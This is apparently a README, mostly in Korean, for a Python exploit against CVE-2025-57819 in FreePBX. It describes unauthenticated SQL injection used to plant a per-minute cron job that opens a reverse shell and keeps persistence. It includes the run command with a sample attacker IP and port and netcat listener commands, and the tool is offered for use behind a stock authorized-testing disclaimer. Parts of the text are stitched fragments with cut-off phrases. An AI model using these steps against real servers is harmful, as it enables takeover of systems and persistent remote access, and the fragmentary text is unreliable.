
Python exploit for CVE-2025-57819 targeting FreePBX via unauthenticated SQL injection to achieve remote code execution with automatic reverse shell and cron-based persistence.
< 15.0.66, < 16.0.89 및 < 17.0.3이 스크립트는 취약한 FreePBX endpoint 모듈의 CVE-2025-57819를 익스플로잇합니다. 이 취약점은 SQL 인젝션을 허용하며, 이를 이용해 악성 cron 작업을 주입합니다.
다른 공개 익스플로잇처럼 업로드된 웹쉘과 대화형 상호작용을 위한 추가 단계는 필요하지 않습니다. 간단한 접근 방식으로, 직접 리버스 쉘에 접근할 수 있습니다.
SQL 인젝션과 cron 작업 조작을 통해 원격 코드 실행이 이루어집니다. 성공적인 익스플로잇은 대상 시스템에서 리버스 쉘을 획득합니다. 구성에 따라 전체 시스템이 손상될 수 있습니다.
* * * * *)을 통한 cron 작업 지속성base64 페이로드는 + 문자가 공백으로 해석되어 손상되므로, 16진수 인코딩된 페이로드를 사용합니다.대상 및 리스너 구성을 제공하여 익스플로잇을 실행합니다:
python3 cve-2025-57819.py <target> <lhost> <lport>
<target>: 대상 호스트명 또는 IP 주소 (취약한 FreePBX 인스턴스)<lhost>: 리버스 쉘 콜백을 위한 공격자 IP 주소<lport>: 수신 연결을 위한 리스닝 포트python3 cve-2025-57819.py freepbx.local 10.10.16.38 9999
익스플로잇 실행 전에 리스너를 시작하세요:
nc -lvnp <port>
nc -nlvp 9999
이 도구는 교육 목적 및 승인된 보안 테스트 전용입니다. 명시적인 허가 없이 시스템에 무단으로 사용하는 것은 불법입니다. 작성자는 이 도구의 오용이나 피해에 대해 책임을 지지 않습니다.
Its1Zero - [email protected]